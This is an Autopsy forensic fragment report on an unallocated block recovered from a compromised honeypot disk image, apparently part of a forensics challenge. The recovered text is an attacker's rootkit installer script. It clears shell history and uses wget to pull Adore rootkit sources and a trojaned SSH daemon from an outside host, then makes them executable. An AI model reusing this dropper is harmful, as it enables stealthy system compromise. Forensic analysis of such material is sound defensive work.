Autopsy ascii Fragment Report (ver 1.74) -------------------------------------------------------------- Fragment: 36691 Length: 4096 bytes Not allocated to any meta data structures MD5 of raw Fragment: 8565944537c4d50fbe648a270495d26b MD5 of ascii output: 8f14c95153c199b9543d508c9d9c0bc6 Image: /home/kmaster/tools/filesystem/evidence//SOTM29/192.168.1.79/images/root_honeypot Image Type: linux-ext3 Date Generated: Sat Sep 20 19:00:38 2003 Investigator: CGR -------------------------------------------------------------- unset HISTFILE HISTSIZE HISTSAVE BLK="\033[0;30m" RED="\033[0;31m" GRN="\033[0;32m" YEL="\033[0;33m" BLU="\033[0;34m" MAG="\033[0;35m" CYN="\033[0;36m" WHI="\033[0;37m" DRED="\033[1;31m" DGRN="\033[1;32m" DYEL="\033[1;33m" DBLU="\033[1;34m" DMAG="\033[1;35m" DCYN="\033[1;36m" DWHI="\033[1;37m" BW="\033[47;1;30m" YBL="\033[44;1;33m" RES="\033[0m" printf "${YBL}redCode${RES}${YBL}redCode${RES}${YBL}redCode${RES}\n" printf "${YBL}redCode${RES}${YBL}Face Treaba${RES}${YBL}ushoara${RES}\n" printf "${DCYN}Creating Directory...${RES}\n" mkdir /tmp/rk printf "${DCYN}Entering Directory${RES}\n" cd /tmp/rk printf "${DCYN}OK${RES}\n" printf "${DCYN}getting the files...${RES}\n" wget izolam.net/rc/inst -q wget izolam.net/rc/kflushd -q printf "${DCYN}OK${RES}\n" printf "${DCYN}Creating Directory...${RES}\n" sleep 1 mkdir /tmp/rk/adore printf "${DCYN}Entering Directory${RES}\n" cd /tmp/rk/adore/ printf "${DCYN}OK${RES}\n" printf "${DCYN}getting the files...${RES}\n" wget izolam.net/rc/adore/adore.c -q wget izolam.net/rc/adore/ava.c -q wget izolam.net/rc/adore/dummy.c -q wget izolam.net/rc/adore/exec.c -q wget izolam.net/rc/adore/exec-test.c -q wget izolam.net/rc/adore/libinvisible.c -q wget izolam.net/rc/adore/libinvisible.h -q wget izolam.net/rc/adore/cleaner.c -q sleep 4 printf "${DCYN}OK${RES}\n" printf "${DCYN}getting the Makefile${RES}\n" wget izolam.net/rc/adore/Makefile -q printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n" printf "${DCYN}Leaving directory..${RES}\n" printf "${DCYN}Creating Directory...${RES}\n" mkdir /tmp/rk/ssh printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n" cd /tmp/rk/ssh printf "${DCYN}getting the files...${RES}\n" wget izolam.net/rc/ssh/sp0 -q wget izolam.net/rc/ssh/sp0_cfg -q wget izolam.net/rc/ssh/sp0_key -q wget izolam.net/rc/ssh/sp0_seed -q sleep 2 printf "${DCYN}Changing the file modes..${RES}\n" chmod 777 sp0 printf "${DCYN}OK${RES}\n" printf "${DCYN}Leaving directory..${RES}\n" cd /tmp/rk/ chmod 777 inst kflushd sleep 1 printf "${DCYN}OK${RES}\n" printf "${DCYN}Cleaning...${RES}\n" printf "${DCYN}[${GRN}OK${DCYN}]${RES}\n" printf "${DCYN}All done...${RES}\n" printf "${DCYN}You Got The redCode rk${RES} ${YEL}$IP${RES}\n" printf "${DRED}Copyright ${BW}[siCk]${RES} ${DCYN}\n" ..................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................